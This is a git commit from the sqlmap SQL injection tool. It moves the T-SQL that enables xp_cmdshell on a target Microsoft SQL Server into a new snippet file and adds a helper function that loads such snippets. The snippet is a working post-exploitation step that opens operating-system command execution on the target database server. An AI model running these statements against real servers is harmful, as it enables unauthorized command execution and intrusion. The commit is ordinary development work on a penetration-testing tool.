adding first code example for SPL snippets

2025-03-03 19:55:47 +03:00 · 2012-02-15 13:17:01 +00:00 · 2012-02-15 13:17:01 +00:00 · 9059d30312
commit 9059d30312
parent edeb4b6113
4 changed files with 23 additions and 7 deletions
--- a/lib/core/common.py
+++ b/lib/core/common.py
@ -1127,6 +1127,7 @@ def cleanQuery(query):
 def setPaths():
    # sqlmap paths
    paths.SQLMAP_EXTRAS_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "extra")
+    paths.SQLMAP_PROCS_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "procs")
    paths.SQLMAP_SHELL_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "shell")
    paths.SQLMAP_TAMPER_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "tamper")
    paths.SQLMAP_TXT_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "txt")
@ -1806,6 +1807,17 @@ def parseXmlFile(xmlFile, handler):
    parse(stream, handler)
    stream.close()

+def getSPLSnippet(name, **variables):
+    """
+    Returns content of snippet stored in program's "procs" directory
+    """
+    filename = os.path.join(paths.SQLMAP_PROCS_PATH, "%s.txt" % name)
+    checkFile(filename)
+    retVal = readCachedFileContent(filename)
+    for _ in variables.keys():
+        retVal = re.sub(r"%%%s%%" % _, variables[_], retVal, flags=re.I)
+    return retVal
+
 def readCachedFileContent(filename, mode='rb'):
    """
    Cached reading of file content (avoiding multiple same file reading)
--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@ -8,12 +8,15 @@ See the file 'doc/COPYING' for copying permission
 """

 from lib.core.common import Backend
+from lib.core.common import getSPLSnippet
 from lib.core.common import randomStr
+from lib.core.common import readCachedFileContent
 from lib.core.common import readInput
 from lib.core.common import wasLastRequestDelayed
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
+from lib.core.data import paths
 from lib.core.exception import sqlmapUnsupportedFeatureException
 from lib.core.session import setXpCmdshellAvailability
 from lib.core.unescaper import unescaper
@ -60,12 +63,7 @@ class xp_cmdshell:
        debugMsg += "stored procedure"
        logger.debug(debugMsg)

-        cmd = "EXEC master..sp_configure 'show advanced options', 1; "
-        cmd += "RECONFIGURE WITH OVERRIDE; "
-        cmd += "EXEC master..sp_configure 'xp_cmdshell', %d; " % mode
-        cmd += "RECONFIGURE WITH OVERRIDE; "
-        cmd += "EXEC sp_configure 'show advanced options', 0; "
-        cmd += "RECONFIGURE WITH OVERRIDE; "
+        cmd = getSPLSnippet("configure_xp_cmdshell", ENABLE=str(mode))

        return cmd

--- a/procs/README.txt
+++ b/procs/README.txt
@ -1,3 +1,3 @@
-Files in this folder represent SQL stored procedure declarations used
+Files in this folder represent SQL Procedural Language snippets used
 by sqlmap on the target system. They are licensed under the terms of
 the GNU Lesser General Public License.
--- a/procs/configure_xp_cmdshell.txt
+++ b/procs/configure_xp_cmdshell.txt
@ -0,0 +1,6 @@
+EXEC master..sp_configure 'show advanced options', 1;
+RECONFIGURE WITH OVERRIDE;
+EXEC master..sp_configure 'xp_cmdshell', %ENABLE%;
+RECONFIGURE WITH OVERRIDE;
+EXEC sp_configure 'show advanced options', 0;
+RECONFIGURE WITH OVERRIDE;